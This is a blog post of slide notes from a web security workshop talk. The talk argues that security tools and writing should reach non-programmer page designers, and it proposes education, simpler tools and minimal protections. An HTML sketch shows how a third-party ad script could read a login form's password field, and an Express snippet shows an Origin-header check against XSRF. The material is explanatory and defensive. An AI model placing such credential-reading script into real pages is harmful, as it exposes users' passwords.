w2sp: Slide 1: Page Creators are not all Programmers

And of course you knew that, because we all know the Internet is actually run by cats.

w2sp: Slide 2: The Internet is run by cats

... and we all know that cats aren't programmers; they're artists.

w2sp: Slide 3: Cats are artists

Seriously, though, many of the people who do web design professionally are artists, not programmers. You can see this through the job titles used and other services offered by many web design firms.

w2sp: Slide 4: Professional web page creators often have artistic backgrounds

And then there's all the people who make pages but aren't professionals. Cat blogs, community sports team sites, small church websites, etc. are often made by non-professionals.

w2sp: Slide 5: And there are plenty of non-professional page creators too!

And in many ways, it's fantastic that all these people can make web pages. Web 2.0! Sharing! Communication! But the problem is that web security is designed for programmers.

w2sp: Slide 6: Web Security is for Programmers

So, for the purposes of visualization, let's pretend that a web page is like a car...

w2sp: Slide 7: Suppose a web site is like a car...

Thus we can imagine web security issues like cross-site scripting and cross-site request forgery are sort of like getting gremlins in your engine.

w2sp: Slide 8: Problem: Gremlins in the engine

With this analogy in mind, let's look at some of the best tools we have for fixing websites:

w2sp: Slide 9: Safer Coding Practices

The big one is safer programming practices. You take your existing website, and replace it with a new, gremlin-proof one. This is pretty programming-intensive, much like you'd need some serious mechanic skills to replace your entire car engine.

Then there's tainting or data flow analysis, which allows you to trace the path of the gremlins through your engine...

w2sp: Slide 10: Tainting

But once you've done that, you still have to patch the code so that the gremlins can't cause problems. Programming!

w2sp: Slide 11: Tainting (Fix The Code)

We've got known exploit detection, such as web application vulnerability scanners and web application firewalls. They tell you exactly where and what kind of gremlins you have.

w2sp: Slide 12: Known Exploit Detection

But while they might protect you for a time, best practice still says you should fix your code.

w2sp: Slide 13: Known Exploit Detection (Fix The Code)

And then there's the cool mashup protections which help you fix your code to provide isolation between components so that the gremlins can't breed in your engine. But they mostly involve a lot of coding to implement.

w2sp: Slide 14: Mashup Protections

Even the language of security is heavily oriented towards programmers. The documentation for Mozilla CSP even includes set theory notation! Not exactly friendly for artists.

w2sp: Slide 15: The Language of Security

Some of the organizations that do the best job of communicating (web) security flaws tend to be intimidating to non-programmers, and really send the message “If you're not a programmer, this isn't for you.” This is not the message we want to send!

w2sp: Slide 16: Non-Programmers still need Security

Because non-programmers really do need security.

w2sp: Slide 17: The Web is a Target

The web is a big target, and attackers aren't limiting themselves to big sites – automated attacks make it worthwhile to compromise even smaller targets. Lots of attackers are interested in sending spam, SEO, evading blacklists, etc. all of which can utilize smaller sites. And the attacks aren't always where you'd expect: Did you know your Facebook account is currently worth more on the black market than your credit card?

w2sp: Slide 18: Design choices affect security

But if you're thinking “So, we just let the designers design and handle security at the programming layer below,” you're missing two important points:

First, smaller sites may not have anyone who can handle security, period.

And second, the design of a page actually affects the security of a page. For example, if you put an advertisement on a page with a form, you've just given that advertiser or advertising server access to your user's data. Programming under the hood can't fix that; it's done on the client side. A lot of “small” sites will use a variety of cut-and-paste code that they found elsewhere, increasing their risks even though they may not realize it.
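To make that concrete, here's a sketch of such a page (the ad URL is hypothetical): the moment the designer pastes in the ad include, the ad server's code runs with full access to the page, form fields included:

    <!-- Any third-party script included in a page runs with full access
         to the DOM, including the login form below. -->
    <form id="login">
      <input name="username">
      <input name="password" type="password">
    </form>
    <!-- hypothetical cut-and-paste ad network include -->
    <script src="http://ads.example.com/banner.js"></script>
    <!-- banner.js could read:
         document.querySelector('#login [name=password]').value -->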

w2sp: Slide 19: So... Now What?

So... that's not terribly good. What can we do about it?

w2sp: Slide 20: Security costs may outweigh risks

Before we propose any solutions, we need to keep in mind that the cost/benefit ratio for smaller sites may be very different from what we expect. Users will reject security advice if it's more costly to implement than their risks are. And for non-technical site creators, the cost of learning security may be months of additional time, personnel, and money spent on training. Whereas how much risk is there of your community sports team website getting compromised? It may not be clear, and it may not be easy to translate into dollars.

w2sp: Slide 21: Provide more secure infrastructure and tools

So the first thing we can do is provide a more secure environment. The same origin policy already provides some basic protection to websites, and it's something designers just accept as part of the web infrastructure.

When I put together these slides, I didn't have any other ideas of what to do, but I've now seen a presentation that suggested some security restrictions that would have minimal impact on the top 100,000 websites but could improve security. (The paper is titled “On the Incoherencies in Web Browser Access Control Policies”)

It'd be really handy if graphical tools like Dreamweaver could generate secure mashups. I even talked to some students from the University of Virginia who are working on small policy additions to Ruby on Rails that could provide security – we need more work like this!

w2sp: Slide 22: Provide education (that non-programmers can understand!)

Education is also a big deal: people won't bother with better security if they don't understand the risks, and they won't fix problems correctly if they don't understand the solutions. But we have to be really careful to provide materials that make sense to the target audience of designers, and that are sufficiently short that they don't cause the costs of learning to exceed the risks.

You know how the EFF has done a great job distilling the complex privacy issues in Facebook and explaining them to the general public? We need materials like that for web security as well as privacy.

w2sp: Slide 23: Provide minimal interventions (web site first aid)

Another way we can help is by providing something akin to website first aid. If you fall and skin your knee, you know enough to wash out the wound, maybe put a bandage on it. You don't need to be a doctor to help your daughter if she trips in the playground. But right now you need to be a website surgeon to handle any security!

There's already some neat stuff out there: the Origin: header provides protection against XSRF with minimal effort, and I worked on a system called SOMA which provides additional controls over includes in websites. But the risk is in letting these minimal interventions grow too huge to be useful for average websites. I'm not a huge fan of Mozilla CSP because it's getting just too big for a quick fix. We need to put a lot of thought into optimizing policies and other solutions for the common cases, and less into flexibility for unlikely edge cases.
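For a sense of what "minimal" means here, this is roughly the entire server-side check that the Origin: header enables. A Node/Express sketch; the route and domain are hypothetical placeholders:

    // A sketch of XSRF protection via the Origin header: refuse
    // state-changing requests from other origins.
    const express = require('express');
    const app = express();

    app.post('/transfer', (req, res) => {
      const origin = req.get('Origin');
      if (origin !== undefined && origin !== 'https://www.example.com') {
        return res.status(403).send('cross-origin request refused');
      }
      // ... perform the state-changing action as usual ...
      res.send('ok');
    });

    app.listen(8080);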

w2sp: Slide 24: Provide Separation Between Security and Design

And of course, it'd make our lives a lot easier if we could provide more separation between security and design so that design choices wouldn't necessarily compromise your security.

w2sp: Slide 25: Offload security to others

If we had more separation between security and design of web pages, we could offload security to others. For example, the people in an organization who may care most about security are your systems administrators, because they're the ones who get woken at 4am if something goes wrong, and they're the ones who have to clean up the mess.

We may even want to consider offloading security to the users: they're the ones whose data is most at risk, and they're willing to install virus scanners and even NoScript to try to protect themselves: surely we could do better there.

And finally, there's always the option of hiring outside security experts. The costs currently are prohibitive for smaller sites, but if basic security were easier, maybe we could make this more reasonable.

One thing I've been working on is a visual system for defining security policy, so it can be integrated with design tools and so security can be articulated in a language designers already understand. I'd be happy to talk more about it if you're curious.

In conclusion, while we're doing some good work in web security, we're really limiting our impact if we don't reach out to the broader range of folk who create web pages. Making web security sound complex, time-consuming and hard at all levels may be great for our job security, but it isn't the best way to go about actually making the web safer for the world!

w2sp: Slide 26: Wrap-up and Questions

Edit: Although I was unaware of this when I wrote the paper whose title is used in this blog post, apparently "No Website Left Behind" is trademarked by Cenzic.